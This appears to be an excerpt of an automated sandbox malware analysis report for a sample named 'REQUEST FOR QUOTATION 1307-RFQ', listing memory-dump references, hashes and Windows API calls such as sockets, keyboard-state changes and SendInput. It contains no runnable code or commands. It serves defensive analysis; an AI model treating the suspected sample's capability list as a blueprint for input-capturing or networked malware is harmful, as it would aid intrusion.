                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3659485706-0
                                                                                                                                                                                                                              • Opcode ID: b3528aa481f7fcb0eb8522191f92e70b5ace6c5fa3869cfeab60d5d6ffa76828
                                                                                                                                                                                                                              • Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3528aa481f7fcb0eb8522191f92e70b5ace6c5fa3869cfeab60d5d6ffa76828
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 004780C3
                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 004780CE
                                                                                                                                                                                                                                • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004780D9
                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004783AA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 780911581-0
                                                                                                                                                                                                                              • Opcode ID: e0598b6a95aabee3d6d7fa6bb81cfef96e97d1b35fca084c28bd1702e1ced289
                                                                                                                                                                                                                              • Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0598b6a95aabee3d6d7fa6bb81cfef96e97d1b35fca084c28bd1702e1ced289
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2808897238-0
                                                                                                                                                                                                                              • Opcode ID: 1a73f5e827cafa9a32e666fb2eece23f75d1219170068d3f03f0e50f057af89d
                                                                                                                                                                                                                              • Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a73f5e827cafa9a32e666fb2eece23f75d1219170068d3f03f0e50f057af89d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                                                                                                                                                                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2214342067-0
                                                                                                                                                                                                                              • Opcode ID: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                                                                                                                                                                                                                              • Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 004764D9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4218353326-0
                                                                                                                                                                                                                              • Opcode ID: 092f116c2936bc2b87017b652f83589aa4a7c30a877edbafeb18071167529c0a
                                                                                                                                                                                                                              • Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 092f116c2936bc2b87017b652f83589aa4a7c30a877edbafeb18071167529c0a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00B2354C
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B235D5
                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00B235E7
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00B235F0
                                                                                                                                                                                                                                • Part of subcall function 00B232FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00B2332C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2652629310-0
                                                                                                                                                                                                                              • Opcode ID: d63c41b29815c2dc576f33034a87efac0a425ea44cb41573fa6309363c4fb9dc
                                                                                                                                                                                                                              • Instruction ID: 7f1a9e6dda71a968b581879664485d40001c9a415e3164d72096d606f0233fef
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d63c41b29815c2dc576f33034a87efac0a425ea44cb41573fa6309363c4fb9dc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C131D272A0022AABDF259F64EC45DAE7BE5EF50B10F0501A8FC08D7254EB39CE51CB90
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InvalidateRect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 634782764-0
                                                                                                                                                                                                                              • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                                                                                                                                                                              • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                                                                                                                                                                              • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 0048AC57
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1352109105-0
                                                                                                                                                                                                                              • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                                                                                                                                                                              • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                                                                                                                                                                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                                                                                                                                                                                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 432972143-0
                                                                                                                                                                                                                              • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                                                                                                                                                                              • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00460C66
                                                                                                                                                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                                                                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00460D33
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 432972143-0
                                                                                                                                                                                                                              • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                                                                                                                                                                              • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                                                                                                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 00436229
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                                                                                                              • Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                                                                                                                                                                                              • Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00484F02
                                                                                                                                                                                                                                • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                                                                                                                                                                                                                                • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                                                                                                                                                                                                                                • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                                                                                                                                                                                                                              • GetCaretPos.USER32(?), ref: 00484F13
                                                                                                                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00484F54
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2759813231-0
                                                                                                                                                                                                                              • Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                                                                                                                                                                                              • Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0048C4D2
                                                                                                                                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0048C534
                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
